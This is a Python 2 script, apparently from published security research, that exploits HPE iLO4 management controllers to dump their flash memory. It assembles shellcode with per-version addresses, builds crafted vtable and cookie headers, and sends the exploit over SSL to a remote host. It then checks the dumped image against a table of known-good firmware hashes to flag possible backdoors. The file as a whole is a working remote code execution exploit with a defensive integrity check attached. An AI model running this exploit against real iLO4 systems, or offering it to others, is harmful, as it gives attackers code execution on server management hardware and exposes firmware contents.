#!/usr/bin/python
# [WORKING] Read Flash
import sys
from exploit_helpers import *
from hexdump import hexdump
from hashlib import sha256
# When True, the raw flash image received below is also written to out.bin.
DEBUG=False
# Allowlist of known-good flash images: sha256 hex digest of the dumped image -> iLO4
# firmware version it belongs to, given without dots (so "250" is version 2.50, which is
# how the command-line version argument is compared later in this file). The received
# image is hashed and looked up here; a digest missing from the table is reported as unknown.
KNOWN_GOODS = {
    "dced8587ff3c9ffb98303e8c92dfb2a365b2d5e728e9c46e043be7768895a4e4": "101",
    "27e504220ab8f4470510be1ecb94434e96655bfe15249f254b7ea8536dd7cff3": "105",
    "046a2db28b77d7d6805c17200787623c5e8affd89528542587a0735f8117021a": "110",
    "b355100c2287fbc1cfb1753f20a20607b17e0d3c9eeffe561b769b0daa8385a2": "113",
    "d3d5e6d192abee517906b38108f00b8c1fc4f4325e02fbe9e33aedf5bb61170e": "120",
    "5344238e154e252849313daa7cee460616449f927dae98c67340fd7f0397fcbd": "122",
    "92d4d11860564d4e234bc5c1c5dcf92e94437982c1685cc9bbe195d487ef6dc9": "130",
    "1c60d5e71d628974b658a2d5a054c217a50bb565e102ae6f949294a321cc964a": "132",
    "0ff2dca21a7c401d685027d101b8fcdd163e58859aa75c85d493af882176568f": "140",
    "4178bd0afbb2eaeb0b8653cf8def9d9d6c8c99234fbd33fd3827f0317df1f2f0": "150",
    "1732746db73cb9d7e15ea03b91c2c113c036eec1a1e36b7016947d9e3967533d": "151",
    "1a32c32aa80540bd86a30a0729b2dff229a0534fe0d8b42623546eb153525243": "153",
    "67584903b0385170fb83ed99512c04c19dde9fc8024e3711b588814acf698ff1": "200",
    "1b794e8f39c5a7afb2c80856be3163344aeafaebdbac2a666c2fcfaabed71869": "202",
    "e7593b532427deec3ba17e1ab50880d37c1a8952ac086423c3ef57d2b7ad3b68": "203",
    "f1b6a3e9cd890e661089b1076a2dda1ad1bdc325a044ba3f1db597a1a24f1bf8": "210",
    "e5994393d94fa1746568c221f2401c2116695af2b9095aa78d65ef3c338f7fc9": "211",
    "64c0839458382647a8ce137b0a11cec56acdd5eb8d54f186932f9c4855d467a7": "222",
    "fd5bace5b109a3e2d4b3a99fad5dc1f782d28f477909240ed4efb7487acc4d20": "230",
    "863e3cad91f18d60f1bb1fa1581d4ef4112c11246b91852d71cbd3cddca920fd": "231",
    "75f197a2ac21ecb15a641b32bfb6f7163ca564fcc02502dbf78ffa79a3797151": "240",
    "f687cf681ca22e8ced2e3e9200f62ec274fe52741233578391d17f6b38be52de": "242",
    "6dbb3d523a2c0b2832e5000ad5633111bbba6d56241941ccbcb62afa40ebee9b": "244",
    "3f8f38e7cc5108a35349b8b0188e16c74a40987147c5b47babf0b7dc0efc17f5": "250",
    "5c323326cdbcebb35ccc35c717542b19daa0648dbf2323b7a4c9f03879d1d803": "254",
    "017c1bcda5cc135e4b29ceb69c68595ca5670c35edcfd0c8043e1a9fea56ee98": "255",
    "9d80a4e81203351cda7942e603d869e1a1ac653aa32e46eb8a2141465fc49462": "260"
}
# Command line: remote_addr remote_port version (version given without dots, e.g. 250).
if len(sys.argv) < 4:
    print "[-] usage: %s remote_addr remote_port version" % sys.argv[0]
    sys.exit(1)
version = sys.argv[3]
# Per-version lookup provided by exploit_helpers; the keys read from it below are
# "wbuff_addr", "SSL_Write" and "VComClientSync_Call", and it is also handed to get_vtable_headers.
o = get_version_info(version)
# Values substituted into the flash_read.S template. Presumably the start offset, byte count
# (0x1000000 = 16 MiB) and chip index of the region to read -- confirm against the template.
addr_start = 0
mem_count = 0x1000000
chip = 0
s = ssl_connector(sys.argv[1], int(sys.argv[2]))
print "[*] Assembling shellcode..."
# flash_read.S is read as a %-format template; the tuple of six values is substituted positionally.
with open("flash_read.S","rb") as fff:
    shellcode = fff.read() % (
        o["wbuff_addr"]+0x4000,
        o["SSL_Write"],
        addr_start,
        mem_count,
        chip,
        o["VComClientSync_Call"]
    )
bin_sc = asm_sc(shellcode)
check_shellcode(bin_sc)
sc_headers = get_sc_headers(bin_sc)
sc_headers += get_flush_headers()
vtable_headers = get_vtable_headers(o)
cookies_headers = get_cookies_headers()
# The version the target reports is compared with the command-line one (dots stripped).
# NOTE(review): a mismatch is only printed here; the script continues regardless.
ilo_version = get_xml_version(s, sc_headers + cookies_headers + vtable_headers)
if version != ilo_version.replace(".",""):
    print "[-] Bad version specified in command line"
ths = fill_threads(sys.argv[1], sc_headers + cookies_headers + vtable_headers)
send_exploit(s, sc_headers + cookies_headers + vtable_headers, o)
stop_threads(ths)
# Receive the image in 0x818-byte reads. From each chunk only bytes [5:0x405] are kept
# (a 5-byte prefix is skipped, 0x400 bytes appended). A chunk shorter than 8 bytes that
# contains "EOT" ends the transfer, as does any chunk that starts with "EOT" (checked by the
# loop condition). An empty recv() is retried rather than treated as a closed connection,
# so a peer that closes the socket early makes this loop spin.
btmp = ""
out = ""
while not btmp.startswith("EOT"):
    btmp = s.recv(0x818)
    if len(btmp) == 0:
        continue
    if "EOT" in btmp and len(btmp) < 8:
        break
    else:
        #hexdump(btmp)
        print "[*] 0x%08x bytes..." % len(out)
        out += btmp[5:0x405]
if DEBUG:
    # Keep a copy of the received image for offline inspection; the handle is not explicitly closed.
    open("out.bin", "wb").write(out)
# Integrity check: the whole received image is hashed and looked up in the KNOWN_GOODS allowlist.
# Any difference from a catalogued release yields an unknown digest -- a truncated or partial
# dump does too, so a miss is a reason to investigate rather than proof of a modified image.
flash_hash = sha256(out).hexdigest()
if flash_hash in KNOWN_GOODS:
    print "[+] Flash contains iLO4 version %s" % KNOWN_GOODS[flash_hash]
else:
    print "[-] Unknown firmware dumped! This might indicate a backdoor!"